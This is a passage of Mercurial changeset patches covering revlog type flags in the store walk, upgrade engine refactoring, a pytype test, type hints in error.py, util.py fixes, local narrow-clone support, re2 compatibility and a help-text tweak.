FILEFLAGS_REVLOG_MAIN +FILETYPE_MANIFESTLOG_OTHER = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_FILELOG_MAIN = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_MAIN +FILETYPE_FILELOG_OTHER = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_OTHER = FILEFLAGS_OTHER class basicstore(object): @@ -425,9 +456,10 @@ p = visit.pop() for f, kind, st in readdir(p, stat=True): fp = p + b'/' + f - if isrevlog(f, kind, st): + rl_type = is_revlog(f, kind, st) + if rl_type is not None: n = 
util.pconvert(fp[striplen:]) - l.append((decodedir(n), n, st.st_size)) + l.append((rl_type, decodedir(n), n, st.st_size)) elif kind == stat.S_IFDIR and recurse: visit.append(fp) l.sort() @@ -445,16 +477,25 @@ return manifest.manifestlog(self.vfs, repo, rootstore, storenarrowmatch) def datafiles(self, matcher=None): - return self._walk(b'data', True) + self._walk(b'meta', True) + files = self._walk(b'data', True) + self._walk(b'meta', True) + for (t, u, e, s) in files: + yield (FILEFLAGS_FILELOG | t, u, e, s) def topfiles(self): # yield manifest before changelog - return reversed(self._walk(b'', False)) + files = reversed(self._walk(b'', False)) + for (t, u, e, s) in files: + if u.startswith(b'00changelog'): + yield (FILEFLAGS_CHANGELOG | t, u, e, s) + elif u.startswith(b'00manifest'): + yield (FILEFLAGS_MANIFESTLOG | t, u, e, s) + else: + yield (FILETYPE_OTHER | t, u, e, s) def walk(self, matcher=None): """return file related to data storage (ie: revlogs) - yields (unencoded, encoded, size) + yields (file_type, unencoded, encoded, size) if a matcher is passed, storage files of only those tracked paths are passed with matches the matcher @@ -500,14 +541,14 @@ self.opener = self.vfs def datafiles(self, matcher=None): - for a, b, size in super(encodedstore, self).datafiles(): + for t, a, b, size in super(encodedstore, self).datafiles(): try: a = decodefilename(a) except KeyError: a = None if a is not None and not _matchtrackedpath(a, matcher): continue - yield a, b, size + yield t, a, b, size def join(self, f): return self.path + b'/' + encodefilename(f) @@ -696,7 +737,9 @@ continue ef = self.encode(f) try: - yield f, ef, self.getsize(ef) + t = revlog_type(f) + t |= FILEFLAGS_FILELOG + yield t, f, ef, self.getsize(ef) except OSError as err: if err.errno != errno.ENOENT: raise diff --git a/mercurial/streamclone.py b/mercurial/streamclone.py --- a/mercurial/streamclone.py +++ b/mercurial/streamclone.py @@ -243,7 +243,7 @@ # Get consistent snapshot of repo, lock during 
scan. with repo.lock(): repo.ui.debug(b'scanning\n') - for name, ename, size in _walkstreamfiles(repo): + for file_type, name, ename, size in _walkstreamfiles(repo): if size: entries.append((name, size)) total_bytes += size @@ -616,7 +616,7 @@ matcher = narrowspec.match(repo.root, includes, excludes) repo.ui.debug(b'scanning\n') - for name, ename, size in _walkstreamfiles(repo, matcher): + for rl_type, name, ename, size in _walkstreamfiles(repo, matcher): if size: entries.append((_srcstore, name, _fileappend, size)) totalfilesize += size diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -192,7 +192,7 @@ # Perform a pass to collect metadata. This validates we can open all # source files and allows a unified progress bar to be displayed. - for unencoded, encoded, size in alldatafiles: + for revlog_type, unencoded, encoded, size in alldatafiles: if not unencoded.endswith(b'.i'): continue diff --git a/mercurial/verify.py b/mercurial/verify.py --- a/mercurial/verify.py +++ b/mercurial/verify.py @@ -416,7 +416,7 @@ storefiles = set() subdirs = set() revlogv1 = self.revlogv1 - for f, f2, size in repo.store.datafiles(): + for t, f, f2, size in repo.store.datafiles(): if not f: self._err(None, _(b"cannot decode filename '%s'") % f2) elif (size > 0 or not revlogv1) and f.startswith(b'meta/'): @@ -480,7 +480,7 @@ ui.status(_(b"checking files\n")) storefiles = set() - for f, f2, size in repo.store.datafiles(): + for rl_type, f, f2, size in repo.store.datafiles(): if not f: self._err(None, _(b"cannot decode filename '%s'") % f2) elif (size > 0 or not revlogv1) and f.startswith(b'data/'): diff --git a/mercurial/wireprotov2server.py b/mercurial/wireprotov2server.py --- a/mercurial/wireprotov2server.py +++ b/mercurial/wireprotov2server.py @@ -1582,7 +1582,8 @@ # TODO this is a bunch of storage layer interface abstractions because # it assumes revlogs. 
- for name, encodedname, size in topfiles: + for rl_type, name, encodedname, size in topfiles: + # XXX use the `rl_type` for that if b'changelog' in files and name.startswith(b'00changelog'): pass elif b'manifestlog' in files and name.startswith(b'00manifest'): diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -754,15 +754,15 @@ $ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)' adding [s] 00manifest.n (70 bytes) - adding [s] 00manifest.i (313 KB) adding [s] 00manifest.d (452 KB) (no-zstd !) adding [s] 00manifest.d (491 KB) (zstd !) adding [s] 00manifest-*.nd (118 KB) (glob) adding [s] 00changelog.n (70 bytes) - adding [s] 00changelog.i (313 KB) adding [s] 00changelog.d (360 KB) (no-zstd !) adding [s] 00changelog.d (368 KB) (zstd !) adding [s] 00changelog-*.nd (118 KB) (glob) + adding [s] 00manifest.i (313 KB) + adding [s] 00changelog.i (313 KB) $ ls -1 stream-clone/.hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617698291 -7200 # Tue Apr 06 10:38:11 2021 +0200 # Node ID cf49e54ef965c44332ebb51f2c0691e8da396e16 # Parent 6085b7f1536dbb3e9375907235e6a7a56af6004f upgrade: take advantage of the new information returned by `store.walk` Before this change the upgrade code had to analyse filename to process them directly. Lets keep that logic private to the store and more to a more robust explicit approach. 
Differential Revision: https://phab.mercurial-scm.org/D10316 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -21,30 +21,34 @@ requirements, revlog, scmutil, + store, util, vfs as vfsmod, ) from ..revlogutils import nodemap -def _revlogfrompath(repo, path): +def _revlogfrompath(repo, rl_type, path): """Obtain a revlog from a repo path. An instance of the appropriate class is returned. """ - if path == b'00changelog.i': + if rl_type & store.FILEFLAGS_CHANGELOG: return changelog.changelog(repo.svfs) - elif path.endswith(b'00manifest.i'): - mandir = path[: -len(b'00manifest.i')] + elif rl_type & store.FILEFLAGS_MANIFESTLOG: + mandir = b'' + if b'/' in path: + mandir = path.rsplit(b'/', 1)[0] return manifest.manifestrevlog( repo.nodeconstants, repo.svfs, tree=mandir ) else: - # reverse of "/".join(("data", path + ".i")) - return filelog.filelog(repo.svfs, path[5:-2]) + # drop the extension and the `data/` prefix + path = path.rsplit(b'.', 1)[0].split(b'/', 1)[1] + return filelog.filelog(repo.svfs, path) -def _copyrevlog(tr, destrepo, oldrl, unencodedname): +def _copyrevlog(tr, destrepo, oldrl, rl_type, unencodedname): """copy all relevant files for `oldrl` into `destrepo` store Files are copied "as is" without any transformation. The copy is performed @@ -52,7 +56,7 @@ content is compatible with format of the destination repository. 
""" oldrl = getattr(oldrl, '_revlog', oldrl) - newrl = _revlogfrompath(destrepo, unencodedname) + newrl = _revlogfrompath(destrepo, rl_type, unencodedname) newrl = getattr(newrl, '_revlog', newrl) oldvfs = oldrl.opener @@ -70,10 +74,7 @@ if copydata: util.copyfile(olddata, newdata) - if not ( - unencodedname.endswith(b'00changelog.i') - or unencodedname.endswith(b'00manifest.i') - ): + if rl_type & store.FILEFLAGS_FILELOG: destrepo.svfs.fncache.add(unencodedname) if copydata: destrepo.svfs.fncache.add(unencodedname[:-2] + b'.d') @@ -107,17 +108,18 @@ return sidedatacompanion -def matchrevlog(revlogfilter, entry): +def matchrevlog(revlogfilter, rl_type): """check if a revlog is selected for cloning. In other words, are there any updates which need to be done on revlog or it can be blindly copied. The store entry is checked against the passed filter""" - if entry.endswith(b'00changelog.i'): + if rl_type & store.FILEFLAGS_CHANGELOG: return UPGRADE_CHANGELOG in revlogfilter - elif entry.endswith(b'00manifest.i'): + elif rl_type & store.FILEFLAGS_MANIFESTLOG: return UPGRADE_MANIFEST in revlogfilter + assert rl_type & store.FILEFLAGS_FILELOG return UPGRADE_FILELOGS in revlogfilter @@ -126,6 +128,7 @@ dstrepo, tr, old_revlog, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -133,11 +136,11 @@ ): """ returns the new revlog object created""" newrl = None - if matchrevlog(upgrade_op.revlogs_to_process, unencoded): + if matchrevlog(upgrade_op.revlogs_to_process, rl_type): ui.note( _(b'cloning %d revisions from %s\n') % (len(old_revlog), unencoded) ) - newrl = _revlogfrompath(dstrepo, unencoded) + newrl = _revlogfrompath(dstrepo, rl_type, unencoded) old_revlog.clone( tr, newrl, @@ -149,9 +152,9 @@ else: msg = _(b'blindly copying %s containing %i revisions\n') ui.note(msg % (unencoded, len(old_revlog))) - _copyrevlog(tr, dstrepo, old_revlog, unencoded) + _copyrevlog(tr, dstrepo, old_revlog, rl_type, unencoded) - newrl = _revlogfrompath(dstrepo, unencoded) + newrl = 
_revlogfrompath(dstrepo, rl_type, unencoded) return newrl @@ -192,11 +195,11 @@ # Perform a pass to collect metadata. This validates we can open all # source files and allows a unified progress bar to be displayed. - for revlog_type, unencoded, encoded, size in alldatafiles: - if not unencoded.endswith(b'.i'): + for rl_type, unencoded, encoded, size in alldatafiles: + if not rl_type & store.FILEFLAGS_REVLOG_MAIN: continue - rl = _revlogfrompath(srcrepo, unencoded) + rl = _revlogfrompath(srcrepo, rl_type, unencoded) info = rl.storageinfo( exclusivefiles=True, @@ -213,19 +216,19 @@ srcrawsize += rawsize # This is for the separate progress bars. - if isinstance(rl, changelog.changelog): - changelogs[unencoded] = rl + if rl_type & store.FILEFLAGS_CHANGELOG: + changelogs[unencoded] = (rl_type, rl) crevcount += len(rl) csrcsize += datasize crawsize += rawsize - elif isinstance(rl, manifest.manifestrevlog): - manifests[unencoded] = rl + elif rl_type & store.FILEFLAGS_MANIFESTLOG: + manifests[unencoded] = (rl_type, rl) mcount += 1 mrevcount += len(rl) msrcsize += datasize mrawsize += rawsize - elif isinstance(rl, filelog.filelog): - filelogs[unencoded] = rl + elif rl_type & store.FILEFLAGS_FILELOG: + filelogs[unencoded] = (rl_type, rl) fcount += 1 frevcount += len(rl) fsrcsize += datasize @@ -270,12 +273,13 @@ ) ) progress = srcrepo.ui.makeprogress(_(b'file revisions'), total=frevcount) - for unencoded, oldrl in sorted(filelogs.items()): + for unencoded, (rl_type, oldrl) in sorted(filelogs.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -309,12 +313,13 @@ progress = srcrepo.ui.makeprogress( _(b'manifest revisions'), total=mrevcount ) - for unencoded, oldrl in sorted(manifests.items()): + for unencoded, (rl_type, oldrl) in sorted(manifests.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -347,12 +352,13 @@ progress = srcrepo.ui.makeprogress( 
_(b'changelog revisions'), total=crevcount ) - for unencoded, oldrl in sorted(changelogs.items()): + for unencoded, (rl_type, oldrl) in sorted(changelogs.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617698307 -7200 # Tue Apr 06 10:38:27 2021 +0200 # Node ID 1c52d77d7861e5d3d90fe07e2236338c56109f76 # Parent cf49e54ef965c44332ebb51f2c0691e8da396e16 upgrade: do not hardcore file extension of revlogs This logic already lives inside the `store` module. So lets reuse it instead. Differential Revision: https://phab.mercurial-scm.org/D10317 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -390,7 +390,7 @@ are cloned""" for path, kind, st in sorted(srcrepo.store.vfs.readdir(b'', stat=True)): # don't copy revlogs as they are already cloned - if path.endswith((b'.i', b'.d', b'.n', b'.nd')): + if store.revlog_type(path) is not None: continue # Skip transaction related files. if path.startswith(b'undo'): # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616128586 14400 # Fri Mar 19 00:36:26 2021 -0400 # Node ID e1d75c514ceda28cced27fee948084f0279a4c93 # Parent 1c52d77d7861e5d3d90fe07e2236338c56109f76 tests: add a (very slow) test that executes pytype This is an updated form of D7295, and completes successfully with pytype 2021.03.22. The 5 or so crashes that were mostly in the hgweb files seems to have been fixed in 2021.03.10. Differential Revision: https://phab.mercurial-scm.org/D10237 diff --git a/tests/test-check-pytype.t b/tests/test-check-pytype.t new file mode 100644 --- /dev/null +++ b/tests/test-check-pytype.t @@ -0,0 +1,105 @@ +#require pytype py3 slow + + $ cd $RUNTESTDIR/.. 
+ +Many of the individual files that are excluded here confuse pytype +because they do a mix of Python 2 and Python 3 things +conditionally. There's no good way to help it out with that as far as +I can tell, so let's just hide those files from it for now. We should +endeavor to empty this list out over time, as some of these are +probably hiding real problems. + +mercurial/bundlerepo.py # no vfs and ui attrs on bundlerepo +mercurial/changegroup.py # mysterious incorrect type detection +mercurial/chgserver.py # [attribute-error] +mercurial/cmdutil.py # No attribute 'markcopied' on mercurial.context.filectx [attribute-error] +mercurial/context.py # many [attribute-error] +mercurial/copies.py # No attribute 'items' on None [attribute-error] +mercurial/crecord.py # tons of [attribute-error], [module-attr] +mercurial/debugcommands.py # [wrong-arg-types] +mercurial/dispatch.py # initstdio: No attribute ... on TextIO [attribute-error] +mercurial/exchange.py # [attribute-error] +mercurial/hgweb/hgweb_mod.py # [attribute-error], [name-error], [wrong-arg-types] +mercurial/hgweb/server.py # [attribute-error], [name-error], [module-attr] +mercurial/hgweb/webcommands.py # [missing-parameter] +mercurial/hgweb/wsgicgi.py # confused values in os.environ +mercurial/httppeer.py # [attribute-error], [wrong-arg-types] +mercurial/interfaces # No attribute 'capabilities' on peer [attribute-error] +mercurial/keepalive.py # [attribute-error] +mercurial/localrepo.py # [attribute-error] +mercurial/lsprof.py # unguarded import +mercurial/manifest.py # [unsupported-operands], [wrong-arg-types] +mercurial/minirst.py # [unsupported-operands], [attribute-error] +mercurial/patch.py # [wrong-arg-types] +mercurial/pure/osutil.py # [invalid-typevar], [not-callable] +mercurial/pure/parsers.py # [attribute-error] +mercurial/pycompat.py # bytes vs str issues +mercurial/repoview.py # [attribute-error] +mercurial/sslutil.py # [attribute-error] +mercurial/statprof.py # bytes vs str on TextIO.write() 
[wrong-arg-types] +mercurial/testing/storage.py # tons of [attribute-error] +mercurial/ui.py # [attribute-error], [wrong-arg-types] +mercurial/unionrepo.py # ui, svfs, unfiltered [attribute-error] +mercurial/upgrade.py # line 84, in upgraderepo: No attribute 'discard' on Dict[nothing, nothing] [attribute-error] +mercurial/util.py # [attribute-error], [wrong-arg-count] +mercurial/utils/procutil.py # [attribute-error], [module-attr], [bad-return-type] +mercurial/utils/stringutil.py # [module-attr], [wrong-arg-count] +mercurial/utils/memorytop.py # not 3.6 compatible +mercurial/win32.py # [not-callable] +mercurial/wireprotoframing.py # [unsupported-operands], [attribute-error], [import-error] +mercurial/wireprotoserver.py # line 253, in _availableapis: No attribute '__iter__' on Callable[[Any, Any], Any] [attribute-error] +mercurial/wireprotov1peer.py # [attribute-error] +mercurial/wireprotov1server.py # BUG?: BundleValueError handler accesses subclass's attrs +mercurial/wireprotov2server.py # [unsupported-operands], [attribute-error] + +TODO: use --no-cache on test server? Caching the files locally helps during +development, but may be a hinderance for CI testing. 
+ + $ pytype -V 3.6 --keep-going --jobs auto mercurial \ + > -x mercurial/bundlerepo.py \ + > -x mercurial/changegroup.py \ + > -x mercurial/chgserver.py \ + > -x mercurial/cmdutil.py \ + > -x mercurial/context.py \ + > -x mercurial/copies.py \ + > -x mercurial/crecord.py \ + > -x mercurial/debugcommands.py \ + > -x mercurial/dispatch.py \ + > -x mercurial/exchange.py \ + > -x mercurial/hgweb/hgweb_mod.py \ + > -x mercurial/hgweb/server.py \ + > -x mercurial/hgweb/webcommands.py \ + > -x mercurial/hgweb/wsgicgi.py \ + > -x mercurial/httppeer.py \ + > -x mercurial/interfaces \ + > -x mercurial/keepalive.py \ + > -x mercurial/localrepo.py \ + > -x mercurial/lsprof.py \ + > -x mercurial/manifest.py \ + > -x mercurial/minirst.py \ + > -x mercurial/patch.py \ + > -x mercurial/pure/osutil.py \ + > -x mercurial/pure/parsers.py \ + > -x mercurial/pycompat.py \ + > -x mercurial/repoview.py \ + > -x mercurial/sslutil.py \ + > -x mercurial/statprof.py \ + > -x mercurial/testing/storage.py \ + > -x mercurial/thirdparty \ + > -x mercurial/ui.py \ + > -x mercurial/unionrepo.py \ + > -x mercurial/upgrade.py \ + > -x mercurial/util.py \ + > -x mercurial/utils/procutil.py \ + > -x mercurial/utils/stringutil.py \ + > -x mercurial/utils/memorytop.py \ + > -x mercurial/win32.py \ + > -x mercurial/wireprotoframing.py \ + > -x mercurial/wireprotoserver.py \ + > -x mercurial/wireprotov1peer.py \ + > -x mercurial/wireprotov1server.py \ + > -x mercurial/wireprotov2server.py \ + > > $TESTTMP/pytype-output.txt || cat $TESTTMP/pytype-output.txt + +Only show the results on a failure, because the output on success is also +voluminous and variable. 
# HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616713154 14400 # Thu Mar 25 18:59:14 2021 -0400 # Node ID 8b6e36e4b553fa382fd46b654e2e6c8d327770c7 # Parent e1d75c514ceda28cced27fee948084f0279a4c93 typing: add type hints to mercurial/error.py The only slightly unusual things here are that `location` is passed to `ParseError` and both bytes and an int (so this accepts both), and the message passed `ProgrammingError` is immediately converted to str. Therefore it is typed as `AnyStr`, because there are a couple of instances that are already passed as str. There are a couple of places where bytes are being passed to builtin exceptions that might need to be converted to str. Differential Revision: https://phab.mercurial-scm.org/D10274 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -20,7 +20,13 @@ if pycompat.TYPE_CHECKING: from typing import ( + Any, + AnyStr, + Iterable, + List, Optional, + Sequence, + Union, ) @@ -109,6 +115,7 @@ """Exception raised on errors in parsing the command line.""" def __init__(self, command, message): + # type: (bytes, bytes) -> None self.command = command self.message = message super(CommandError, self).__init__() @@ -120,6 +127,7 @@ """Exception raised if command is not in the command table.""" def __init__(self, command, all_commands=None): + # type: (bytes, Optional[List[bytes]]) -> None self.command = command self.all_commands = all_commands super(UnknownCommand, self).__init__() @@ -131,6 +139,7 @@ """Exception raised if command shortcut matches more than one command.""" def __init__(self, prefix, matches): + # type: (bytes, List[bytes]) -> None self.prefix = prefix self.matches = matches super(AmbiguousCommand, self).__init__() @@ -142,6 +151,7 @@ """Exception raised when a worker process dies.""" def __init__(self, status_code): + # type: (int) -> None self.status_code = status_code # Pass status code to superclass just so it becomes part of 
__bytes__ super(WorkerError, self).__init__(status_code) @@ -159,6 +169,7 @@ """Exception raised when a continuable command required merge conflict resolution.""" def __init__(self, opname): + # type: (bytes) -> None from .i18n import _ self.opname = opname @@ -194,6 +205,7 @@ return pycompat.sysstr(self.__bytes__()) def format(self): + # type: () -> bytes from .i18n import _ message = _(b"abort: %s\n") % self.message @@ -247,10 +259,12 @@ """Exception raised when parsing config files""" def __init__(self, message, location=None, hint=None): + # type: (bytes, Optional[bytes], Optional[bytes]) -> None super(ConfigError, self).__init__(message, hint=hint) self.location = location def format(self): + # type: () -> bytes from .i18n import _ if self.location is not None: @@ -300,10 +314,12 @@ """Raised when parsing config files and {rev,file}sets (msg[, pos])""" def __init__(self, message, location=None, hint=None): + # type: (bytes, Optional[Union[bytes, int]], Optional[bytes]) -> None super(ParseError, self).__init__(message, hint=hint) self.location = location def format(self): + # type: () -> bytes from .i18n import _ if self.location is not None: @@ -323,6 +339,7 @@ def getsimilar(symbols, value): + # type: (Iterable[bytes], bytes) -> List[bytes] sim = lambda x: difflib.SequenceMatcher(None, value, x).ratio() # The cutoff for similarity here is pretty arbitrary. It should # probably be investigated and tweaked. 
@@ -330,6 +347,7 @@ def similarity_hint(similar): + # type: (List[bytes]) -> Optional[bytes] from .i18n import _ if len(similar) == 1: @@ -345,6 +363,7 @@ """Exception raised when a {rev,file}set references an unknown identifier""" def __init__(self, function, symbols): + # type: (bytes, Iterable[bytes]) -> None from .i18n import _ similar = getsimilar(symbols, function) @@ -379,6 +398,7 @@ """Raised if I/O to stdout or stderr fails""" def __init__(self, err): + # type: (IOError) -> None IOError.__init__(self, err.errno, err.strerror) # no __bytes__() because error message is derived from the standard IOError @@ -386,6 +406,7 @@ class UnsupportedMergeRecords(Abort): def __init__(self, recordtypes): + # type: (Iterable[bytes]) -> None from .i18n import _ self.recordtypes = sorted(recordtypes) @@ -404,12 +425,15 @@ """generic exception for aborting from an encounter with an unknown version""" def __init__(self, msg, hint=None, version=None): + # type: (bytes, Optional[bytes], Optional[bytes]) -> None self.version = version super(UnknownVersion, self).__init__(msg, hint=hint) class LockError(IOError): def __init__(self, errno, strerror, filename, desc): + # TODO: figure out if this should be bytes or str + # _type: (int, str, str, bytes) -> None IOError.__init__(self, errno, strerror, filename) self.desc = desc @@ -456,6 +480,7 @@ """Raised if a mercurial (core or extension) developer made a mistake""" def __init__(self, msg, *args, **kwargs): + # type: (AnyStr, Any, Any) -> None # On Python 3, turn the message back into a string since this is # an internal-only error that won't be printed except in a # stack traces. @@ -499,7 +524,7 @@ entries.append(b"%s=%r" % (par, pycompat.maybebytestr(val))) if entries: msg = b'%s - %s' % (msg, b', '.join(entries)) - ValueError.__init__(self, msg) + ValueError.__init__(self, msg) # TODO: convert to str? 
class ReadOnlyPartError(RuntimeError): @@ -533,6 +558,7 @@ """ def __init__(self, filename, node, tombstone): + # type: (bytes, bytes, bytes) -> None from .node import short StorageError.__init__(self, b'%s:%s' % (filename, short(node))) @@ -588,5 +614,6 @@ """ def __init__(self, message, args=None): + # type: (bytes, Optional[Sequence[bytes]]) -> None self.message = message self.messageargs = args # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616718120 14400 # Thu Mar 25 20:22:00 2021 -0400 # Node ID 64400d05db1e91dd8e79af85306355dd08178af4 # Parent 8b6e36e4b553fa382fd46b654e2e6c8d327770c7 util: fix the signature for the pypy override of sortdict.update() PyCharm flagged this as not matching the base class signature. Not sure if there was anything supplying these extra arguments though. Differential Revision: https://phab.mercurial-scm.org/D10275 diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -1296,11 +1296,13 @@ if pycompat.ispypy: # __setitem__() isn't called as of PyPy 5.8.0 - def update(self, src): + def update(self, src, **f): if isinstance(src, dict): src = pycompat.iteritems(src) for k, v in src: self[k] = v + for k in f: + self[k] = f[k] def insert(self, position, key, value): for (i, (k, v)) in enumerate(list(self.items())): # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616725781 14400 # Thu Mar 25 22:29:41 2021 -0400 # Node ID 51841b23670bbd659dfd9cc70bab27c325278ebe # Parent 64400d05db1e91dd8e79af85306355dd08178af4 typing: make minor adjustments to mercurial/util.py to pass pytype checking I'm assuming the wrong-arg-count is a pytype bug, because this code is used by the config object. Avoiding initializing `_lrucachenode` node points to None eliminates a few `is not None` assertions, but apparently not all of them. I can't figure out why it gets confused over the state where these new assertions are. 
Differential Revision: https://phab.mercurial-scm.org/D10276 diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -1265,7 +1265,8 @@ """call this before writes, return self or a copied new object""" if getattr(self, '_copied', 0): self._copied -= 1 - return self.__class__(self) + # Function cow.__init__ expects 1 arg(s), got 2 [wrong-arg-count] + return self.__class__(self) # pytype: disable=wrong-arg-count return self def copy(self): @@ -1408,8 +1409,8 @@ __slots__ = ('next', 'prev', 'key', 'value', 'cost') def __init__(self): - self.next = None - self.prev = None + self.next = self + self.prev = self self.key = _notset self.value = None @@ -1448,9 +1449,7 @@ def __init__(self, max, maxcost=0): self._cache = {} - self._head = head = _lrucachenode() - head.prev = head - head.next = head + self._head = _lrucachenode() self._size = 1 self.capacity = max self.totalcost = 0 @@ -1555,6 +1554,7 @@ """ try: node = self._cache[k] + assert node is not None # help pytype return node.value except KeyError: if default is _notset: @@ -1612,6 +1612,9 @@ # Walk the linked list backwards starting at tail node until we hit # a non-empty node. 
n = self._head.prev + + assert n is not None # help pytype + while n.key is _notset: n = n.prev diff --git a/tests/test-check-pytype.t b/tests/test-check-pytype.t --- a/tests/test-check-pytype.t +++ b/tests/test-check-pytype.t @@ -89,7 +89,6 @@ > -x mercurial/ui.py \ > -x mercurial/unionrepo.py \ > -x mercurial/upgrade.py \ - > -x mercurial/util.py \ > -x mercurial/utils/procutil.py \ > -x mercurial/utils/stringutil.py \ > -x mercurial/utils/memorytop.py \ # HG changeset patch # User Charles Chamberlain <cchamberlain@janestreet.com> # Date 1618004508 14400 # Fri Apr 09 17:41:48 2021 -0400 # Node ID 631001150e136d8c35f08a6aa6742eee308c03fd # Parent 51841b23670bbd659dfd9cc70bab27c325278ebe narrow: add capabilities for local repos, not just remote peers This fixes the bug where running `hg clone --narrow ./local-repo` fails with abort: server does not support narrow clones even when the server has narrow enabled. Differential Revision: https://phab.mercurial-scm.org/D10357 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -73,6 +73,7 @@ txnutil, util, vfs as vfsmod, + wireprototypes, ) from .interfaces import ( @@ -1495,6 +1496,8 @@ bundle2.getrepocaps(self, role=b'client') ) caps.add(b'bundle2=' + urlreq.quote(capsblob)) + if self.ui.configbool(b'experimental', b'narrow'): + caps.add(wireprototypes.NARROWCAP) return caps # Don't cache auditor/nofsauditor, or you'll end up with reference cycle: diff --git a/tests/test-narrow-clone.t b/tests/test-narrow-clone.t --- a/tests/test-narrow-clone.t +++ b/tests/test-narrow-clone.t @@ -64,15 +64,17 @@ $ cd .. -BUG: local-to-local narrow clones should work, but don't. 
+local-to-local narrow clones work $ hg clone --narrow master narrow-via-localpeer --noupdate --include "dir/src/f10" requesting all changes - abort: server does not support narrow clones - [255] + adding changesets + adding manifests + adding file changes + added 3 changesets with 1 changes to 1 files + new changesets 5d21aaea77f8:26ce255d5b5d $ hg tracked -R narrow-via-localpeer - abort: repository narrow-via-localpeer not found - [255] + I path:dir/src/f10 $ rm -Rf narrow-via-localpeer narrow clone with a newline should fail diff --git a/tests/test-narrow.t b/tests/test-narrow.t --- a/tests/test-narrow.t +++ b/tests/test-narrow.t @@ -61,7 +61,7 @@ [255] Names with '.' in them are OK. - $ hg clone --narrow ssh://user@dummy/master should-work --include a/.b/c + $ hg clone --narrow ./master should-work --include a/.b/c requesting all changes adding changesets adding manifests # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618281767 14400 # Mon Apr 12 22:42:47 2021 -0400 # Node ID 856820b497fcf31b7904e0b160c318437581d0c0 # Parent 631001150e136d8c35f08a6aa6742eee308c03fd # Parent bc268ea9f9843d65586186c0c735001510dd1daf merge with stable diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -5,6 +5,9 @@ # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
+# See https://github.com/google/pytype/issues/860 +# pytype: skip-file + from __future__ import absolute_import from ..i18n import _ diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -2177,6 +2177,7 @@ return True +_re2_input = lambda x: x try: import re2 # pytype: disable=import-error @@ -2188,11 +2189,21 @@ class _re(object): def _checkre2(self): global _re2 + global _re2_input try: # check if match works, see issue3964 - _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]')) + check_pattern = br'\[([^\[]+)\]' + check_input = b'[ui]' + _re2 = bool(re2.match(check_pattern, check_input)) except ImportError: _re2 = False + except TypeError: + # the `pyre-2` project provides a re2 module that accept bytes + # the `fb-re2` project provides a re2 module that acccept sysstr + check_pattern = pycompat.sysstr(check_pattern) + check_input = pycompat.sysstr(check_input) + _re2 = bool(re2.match(check_pattern, check_input)) + _re2_input = pycompat.sysstr def compile(self, pat, flags=0): """Compile a regular expression, using re2 if possible @@ -2208,7 +2219,7 @@ if flags & remod.MULTILINE: pat = b'(?m)' + pat try: - return re2.compile(pat) + return re2.compile(_re2_input(pat)) except re2.error: pass return remod.compile(pat, flags) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618061290 -7200 # Sat Apr 10 15:28:10 2021 +0200 # Node ID ede52e19c752eeff69d4df8188413b0111a62f04 # Parent 856820b497fcf31b7904e0b160c318437581d0c0 help: point to `hg help urls` in `hg help config.paths` This seems useful to point at what people can put as value for these config. Differential Revision: https://phab.mercurial-scm.org/D10371 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1702,7 +1702,8 @@ These symbolic names can be used from the command line. To pull from ``my_server``: :hg:`pull my_server`. 
